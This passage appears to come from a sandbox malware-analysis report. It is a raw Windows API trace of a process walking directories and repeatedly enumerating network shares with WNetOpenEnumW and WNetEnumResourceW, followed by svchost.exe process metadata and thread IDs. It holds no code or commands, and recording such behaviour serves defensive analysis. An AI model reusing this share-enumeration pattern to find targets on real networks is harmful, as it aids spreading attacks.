lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xfaeead90, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xfeca8830, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0238.170] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xfaeead90, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xfeca8830, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0238.170] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xfaeead90, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xfeca8830, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0238.170] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0238.171] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0238.171] SendMessageW (hWnd=0x2014e, Msg=0x8003, wParam=0x0, lParam=0x0) returned 0x0 Thread: id = 204 os_tid = 0x318 [0226.274] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x3c1fee0 | out: lphEnum=0x3c1fee0*=0x31de070) returned 0x0 [0226.363] WNetEnumResourceW (in: hEnum=0x31de070, lpcCount=0x3c1fedc, lpBuffer=0x3251350, lpBufferSize=0x3c1fed8 | out: lpcCount=0x3c1fedc, lpBuffer=0x3251350, lpBufferSize=0x3c1fed8) returned 0x0 [0226.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b70b8 [0226.363] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7100 [0226.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3bf8 [0226.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7148 [0226.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7190 [0226.364] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x3251350, lphEnum=0x3c1fe28 | out: lphEnum=0x3c1fe28*=0x653098) returned 0x0 [0226.372] WNetEnumResourceW (in: hEnum=0x653098, lpcCount=0x3c1fe24, lpBuffer=0x3256398, lpBufferSize=0x3c1fe20 | out: lpcCount=0x3c1fe24, lpBuffer=0x3256398, lpBufferSize=0x3c1fe20) returned 0x103 [0226.372] WNetCloseEnum (hEnum=0x653098) returned 0x0 [0226.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7100 | out: hHeap=0x630000) returned 1 [0226.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b70b8 | out: hHeap=0x630000) returned 1 [0226.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b70b8 [0226.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7100 [0226.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xe0) returned 0x687df8 [0226.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b6ad0 [0226.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7220 [0226.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7190 | out: hHeap=0x630000) returned 1 [0226.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7148 | out: hHeap=0x630000) returned 1 [0226.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b3bf8 | out: hHeap=0x630000) returned 1 [0226.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7148 [0226.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7190 [0226.373] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x3251370, lphEnum=0x3c1fe28 | out: lphEnum=0x3c1fe28*=0x3c1fe44) returned 0x4b8 [0240.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7100 | out: hHeap=0x630000) returned 1 [0240.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b70b8 | out: hHeap=0x630000) returned 1 [0240.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0240.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0240.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x150) returned 0x3192918 [0240.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b70b8 [0240.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7100 [0240.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b6e30 [0240.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf768 [0240.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7220 | out: hHeap=0x630000) returned 1 [0240.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b6ad0 | out: hHeap=0x630000) returned 1 [0240.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7190 | out: hHeap=0x630000) returned 1 [0240.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7148 | out: hHeap=0x630000) returned 1 [0240.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x687df8 | out: hHeap=0x630000) returned 1 [0240.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0240.449] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8ac8 [0240.449] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x3251390, lphEnum=0x3c1fe28 | out: lphEnum=0x3c1fe28*=0x3c1fe44) returned 0x4c6 [0240.456] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0240.456] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0240.456] WNetEnumResourceW (in: hEnum=0x31de070, lpcCount=0x3c1fedc, lpBuffer=0x3251350, lpBufferSize=0x3c1fed8 | out: lpcCount=0x3c1fedc, lpBuffer=0x3251350, lpBufferSize=0x3c1fed8) returned 0x103 [0240.456] WNetCloseEnum (hEnum=0x31de070) returned 0x0 [0240.456] SendMessageW (hWnd=0x2014e, Msg=0x8004, wParam=0x0, lParam=0x0) returned 0x0 Process: id = "16" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x25844000" os_pid = "0x3dc" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "15" os_parent_pid = "0x1c4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e070" [0xc000000f], "LOCAL" [0x7] Thread: id = 184 os_tid = 0x4ac Thread: id = 185 os_tid = 0x7f8 Thread: id = 186 os_tid = 0x7e4 Thread: id = 187 os_tid = 0x7c4 Thread: id = 188 os_tid = 0x7b8 Thread: id = 189 os_tid = 0x78c Thread: id = 190 os_tid = 0x770 Thread: id = 191 os_tid = 0x768 Thread: id = 192 os_tid = 0x68c Thread: id = 193 os_tid = 0x444 Thread: id = 194 os_tid = 0x154 Thread: id = 195 os_tid = 0x12c Thread: id = 196 os_tid = 0xc8 Thread: id = 197 os_tid = 0x3f0 Thread: id = 198 os_tid = 0x3e4 Thread: id = 199 os_tid = 0x3e0